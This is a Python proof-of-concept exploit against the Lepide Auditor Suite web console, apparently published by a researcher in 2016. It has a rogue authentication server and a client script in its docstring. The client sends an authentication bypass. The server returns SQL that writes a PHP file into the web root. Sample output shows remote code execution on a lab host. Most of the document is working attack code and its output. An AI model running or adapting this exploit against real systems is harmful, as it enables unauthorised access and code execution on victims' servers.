#!/usr/bin/python """ Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability Vendor: http://www.lepide.com/ File: lepideauditorsuite.zip SHA1: 3c003200408add04308c04e3e0ae03b7774e4120 Download: http://www.lepide.com/lepideauditor/download.html Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/ Summary: ======== The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root. Additional code: ================ When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code: root@kali:~# cat client-poc.py #!/usr/bin/python import requests import sys if len(sys.argv) < 3: print "(+) usage: %s " % sys.argv[0] sys.exit(-1) target = sys.argv[1] server = sys.argv[2] s = requests.Session() print "(+) sending auth bypass" s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False) print "(+) sending code execution request" s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'2@3','id':'6'}) Example: ======== root@kali:~# ./server-poc.py Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution by mr_me 2016 (+) waiting for the target... (+) connected by ('172.16.175.174', 50541) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) connected by ('172.16.175.174', 50542) (+) got a login request (+) got a username: test (+) got a password: hacked (+) sending SUCCESS packet (+) send string successful (+) got a column request (+) got http request id: 6 (+) got http request path: lol (+) send string successful (+) got a filename request (+) got http request daterange: 1@9 - 23:59:59 (+) got http request id: 6 (+) got http request path: lol (+) successfully sent tag (+) successfully sent file! (+) file sent successfully (+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo(); In another console: root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1 (+) sending auth bypass (+) sending code execution request """ import struct import socket from thread import start_new_thread import struct LOGIN = 601 COLUMN = 604 FILENAME = 603 VALID = 2 TAGR = 4 FILEN = 5 SUCCESS = "_SUCCESS_" def get_string(conn): size = struct.unpack(">i", conn.recv(4))[0] data = conn.recv(size).decode("utf-16") conn.send(struct.pack(">i", VALID)) return data def send_string(conn, string): size = len(string.encode("utf-16-le")) conn.send(struct.pack(">i", size)) conn.send(string.encode("utf-16-le")) return struct.unpack(">i", conn.recv(4))[0] def send_tag(conn, tag): conn.send(struct.pack(">i", TAGR)) conn.send(struct.pack(">i", tag)) return struct.unpack(">i", conn.recv(4))[0] def send_file(conn, filedata): if send_tag(conn, FILEN) == 2: print "(+) successfully sent tag" # send length of file conn.send(struct.pack(">i", len(filedata.encode("utf-16-le")))) # send the malicious payload conn.send(filedata.encode("utf-16-le")) if struct.unpack(">i", conn.recv(4))[0] == 2: print "(+) successfully sent file!" if send_tag(conn, VALID) == 2: return True return False def client_thread(conn): """ Let's put it this way, my mum's not proud of my code. """ while True: data = conn.recv(4) if data: resp = struct.unpack(">i", data)[0] if resp == 4: code = conn.recv(resp) resp = struct.unpack(">i", code)[0] # stage 1 if resp == LOGIN: print "(+) got a login request" # send a VALID response back conn.send(struct.pack(">i", VALID)) # now we expect to get the username and password print "(+) got a username: %s" % get_string(conn) print "(+) got a password: %s" % get_string(conn) # now we try to send to send a success packet print "(+) sending SUCCESS packet" if send_string(conn, SUCCESS) == 2: print "(+) send string successful" # stage 2 elif resp == COLUMN: print "(+) got a column request" # send a VALID response back conn.send(struct.pack(">i", VALID)) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) if send_string(conn, "foo-bar") == 2: print "(+) send string successful" # stage 3 - this is where the exploitation is elif resp == FILENAME: print "(+) got a filename request" conn.send(struct.pack(">i", VALID)) # now we read back 3 strings... print "(+) got http request daterange: %s" % get_string(conn) print "(+) got http request id: %s" % get_string(conn) print "(+) got http request path: %s" % get_string(conn) # exploit! if send_file(conn, "select '' into outfile '../../www/offsec.php';"): print "(+) file sent successfully" print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0]) break conn.close() HOST = '0.0.0.0' PORT = 1056 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(10) print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution" print "by mr_me 2016\t\n" print "(+) waiting for the target..." while True: # blocking call, waits to accept a connection conn, addr = s.accept() print '(+) connected by %s' % addr start_new_thread(client_thread, (conn,)) s.close()